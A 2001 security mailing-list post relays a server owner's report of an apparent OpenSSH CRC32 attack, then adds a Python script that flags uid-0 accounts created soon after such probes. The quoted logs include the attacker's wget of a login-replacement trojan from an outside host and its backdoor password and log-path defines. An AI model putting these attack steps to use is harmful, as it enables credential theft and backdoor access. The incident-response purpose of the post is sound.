Security Incidents mailing list archives

Attacks against SSH?


From: johan.augustsson () adm gu se
Date: Mon, 03 Dec 2001 08:30:23 +0100


I stumbled over this post on the openssh-unix-dev mailing list last week -
http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
The poster claims that he had OpenSSH-2.9p2-8.7 (the latest update for
RedHat 7.0) up and running when he received what looks to be a
CRC32 attack. A few minutes later you can see (he posted parts of the
logfile) a new user being created with uid=0 and then how a connection
is made from a system in Israel.

There has been no confirmation of what he writes, but I received the
following mail as an answer to my questions.

------ Message ------
I posted an openssh security alert earlier today and already got some
responses.
Thanks for everything.

Instead of replying to everyone individually I composed the details of
the attack.

+++

It does not look like the job of a worm.
Snort did not detect a mass port scan from the attacker's IP address. It
seems that he (I assume, so I don't have to type he/she all the way)
just wants to gain access through openssh.

The server is running Red Hat 7.0, with all packages up to date. The
following daemons are running: wu-ftpd, apache, telnet, openssh, named.
I never access the system via telnet; it is there just for backup
purposes.

Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash

After the attacker gained root access, he created two users, mattan and
mattanl.
He then downloaded a package: wget http://home.dal.net/resolve/login.tgz.
The target site has been compromised (hacked by a hacker group in
Israel).
This is a login replacement package; it logs user ids and passwords.
He modified rk.h to:
#define MY_LOGFILE "/dev/ttypz"
#define MY_PASSWORD "1245890"
After he compiled and installed the login replacement, something went
wrong. /bin/login was zero bytes in length, so when he came back using
telnet, he was denied access. I also disabled sshd and kept one session
open for remote control after I found that login had been replaced. I
md5-checked the system against a good backup; nothing else was altered.

I will try to sniff all packets that come to this server on the ssh
port. If he attempts to crack the server again, I will have more
details. But I guess I will have to turn the server back on.

Thanks for all your time
------ End of message ------

I had some further questions, so I mailed the guy once again, but I have
not received any answer.

So, to the main question.
Has anyone else had a system compromised by the CRC32 attack when
running a version of sshd that is believed to be secure (OpenSSH-2.3.0
or later, SSH 1.2.32 or later)?



/Johan Augustsson

--------------------------------------------------------------------
Johan Augustsson                 Phone: +46 (0)31 773 1000
Incident Response Team           Fax: +46 (0)31 773 1087
Göteborg University              E-mail: Johan.Augustsson () adm gu se
Sweden
--------------------------------------------------------------------
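The log excerpt quoted in the forwarded message, run through a small correlation check: this is an added example, not code from the original post or from OpenSSH. It parses syslog lines in the format shown above, treats the sshd "crc32 compensation attack" and "Corrupted check bytes on input" messages as probes, and flags any adduser event that creates a uid-0 account under a name other than root, rating it critical when probes precede it within a window. The year (syslog omits it), the 15-minute window and the extra benign adduser line for backupop are assumptions of the example.

```python
"""Correlate sshd CRC32 compensation attack messages with uid-0 account
creation, as seen in the incident log above.

Added example; not code from the original post. Assumes the syslog layout
shown in the quoted log and that the log year is 2001 (syslog omits the year).
"""
import re
from datetime import datetime, timedelta

# Sample input: the sshd, CROND and adduser lines quoted in the post above,
# plus one constructed benign adduser line (backupop, uid=530) that must not
# be flagged.
SAMPLE_LOG = """\
Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash
Nov 25 12:02:11 ns adduser[11100]: new user: name=backupop, uid=530, gid=530, home=/home/backupop, shell=/bin/bash
"""

# "Mon DD HH:MM:SS host prog[pid]: message" (pid is optional in syslog).
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
NEW_USER_RE = re.compile(r"new user: name=(?P<name>[^,]+), uid=(?P<uid>\d+)")

# The two sshd disconnect messages that appear in the quoted log.
CRC32_MARKERS = ("crc32 compensation attack", "Corrupted check bytes on input")


def parse_line(line, year=2001):
    """Parse one syslog line into a dict; return None for lines that don't match."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "prog": m["prog"],
            "pid": m["pid"], "msg": m["msg"]}


def crc32_probes(events):
    """sshd events whose message carries one of the CRC32 attack markers."""
    return [e for e in events
            if e["prog"] == "sshd" and any(k in e["msg"] for k in CRC32_MARKERS)]


def analyze(log_text, window=timedelta(minutes=15)):
    """Return one finding per uid-0 account created under a non-root name.

    A finding is 'critical' when at least one CRC32 probe precedes the account
    creation within `window`, otherwise 'high' (a stray uid-0 account is
    still worth a look even without the sshd noise).
    """
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    probes = crc32_probes(events)
    findings = []
    for e in events:
        if e["prog"] != "adduser":
            continue
        m = NEW_USER_RE.search(e["msg"])
        if not m or int(m["uid"]) != 0 or m["name"] == "root":
            continue
        prior = [p for p in probes if timedelta(0) <= e["ts"] - p["ts"] <= window]
        findings.append({
            "when": e["ts"],
            "name": m["name"],
            "pid": e["pid"],
            "probe_count": len(prior),
            # Seconds from the first probe in the window to the account creation.
            "lead_seconds": int((e["ts"] - prior[0]["ts"]).total_seconds()) if prior else None,
            "severity": "critical" if prior else "high",
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        tail = f" (first probe {f['lead_seconds']} s earlier)" if f["lead_seconds"] is not None else ""
        print(f"{f['severity'].upper()}: uid-0 account '{f['name']}' created at "
              f"{f['when']:%b %d %H:%M:%S} by adduser[{f['pid']}], "
              f"{f['probe_count']} CRC32 probe(s) in the preceding window{tail}")
```

On the quoted log this reports a single critical finding for the account mattan, created 167 seconds after the first "crc32 compensation attack" disconnect, with four probes in the window; the mattanl account (uid 528) and the constructed backupop line are ignored. The check keys on adduser's own log line rather than on /etc/passwd, so it also catches accounts that are created and deleted between two integrity scans; pairing it with the md5 comparison against a known-good backup that the poster describes covers the binary replacement half of the intrusion.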

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

